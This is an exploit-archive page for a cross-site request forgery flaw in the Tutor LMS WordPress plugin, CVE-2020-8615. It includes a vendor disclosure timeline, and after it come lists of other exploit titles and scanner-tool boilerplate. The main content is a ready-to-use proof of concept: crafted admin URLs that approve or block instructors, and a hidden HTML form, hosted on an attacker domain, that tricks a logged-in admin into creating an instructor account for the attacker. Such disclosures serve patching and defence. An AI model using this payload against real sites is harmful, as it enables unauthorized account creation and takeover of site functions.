"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)"

Author

Exploit author

"Jinson Varghese Behanan"

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-02

                
                    
                         Download file
                    
                
            
# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615

# 1. Description

# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses. 
# An attacker can use CSRF to register themselves as an instructor or block other legit instructors. 
# Consequently, if the option to create courses without admin approval is enabled on the plugin’s settings 
# page, the attacker will be able to create courses directly as well. All WordPress websites 
# using Tutor LMS version 1.5.2 and below are affected.

# 2. Proof of Concept

# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF 
# attack to approve an attacker-controlled instructor account can be performed by having the admin 
# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly, 
# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked 
# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.

# CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor 
# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval. 
# This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is 
# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can 
# be tricked into visiting the link and triggering the request to add an instructor.

<html>
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="https://TARGET/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="add&#95;new&#95;instructor" />
			<input type="hidden" name="first&#95;name" value="John" />
			<input type="hidden" name="last&#95;name" value="Doe" />
			<input type="hidden" name="user&#95;login" value="jd_instructor" />
			<input type="hidden" name="email" value="jd@TARGET" />
			<input type="hidden" name="phone&#95;number" value="1231231231" />
			<input type="hidden" name="password" value="Pa&#36;&#36;w0rd&#33;" /> 
			<input type="hidden" name="password&#95;confirmation" value="Pa&#36;&#36;w0rd&#33;" />
			<input type="hidden" name="tutor&#95;profile&#95;bio" value="Et&#32;tempore&#32;culpa&#32;n" />
			<input type="hidden" name="action" value="tutor&#95;add&#95;instructor" /> 
			<input type="submit" value="Submit request" />
		</form> 
	</body>
</html>

3. Timeline

Vulnerability reported to the Tutor LMS team – January 30, 2020.
Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting"	webapps	php	"Hemant Patidar"
2020-12-02	"WordPress Plugin Wp-FileManager 6.8 - RCE"	webapps	php	"Mansoor R"
2020-12-02	"WonderCMS 3.1.3 - Authenticated Remote Code Execution"	webapps	php	zetc0de
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Simple College Website 1.0 - 'page' Local File Inclusion"	webapps	php	Mosaaed
2020-12-02	"Car Rental Management System 1.0 - SQL Injection / Local File include"	webapps	php	Mosaaed
2020-12-02	"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution"	webapps	php	zetc0de
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"
2020-12-01	"Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS"	webapps	php	yunaranyancat

Release Date	Title	Type	Platform	Author
2020-11-13	"OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure"	webapps	php	"Jinson Varghese Behanan"
2020-11-09	"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF"	webapps	hardware	"Jinson Varghese Behanan"
2020-08-28	"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting"	webapps	multiple	"Jinson Varghese Behanan"
2020-07-29	"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"
2020-03-24	"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"
2020-03-02	"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)"	webapps	php	"Jinson Varghese Behanan"
2020-02-17	"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"
2020-02-10	"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.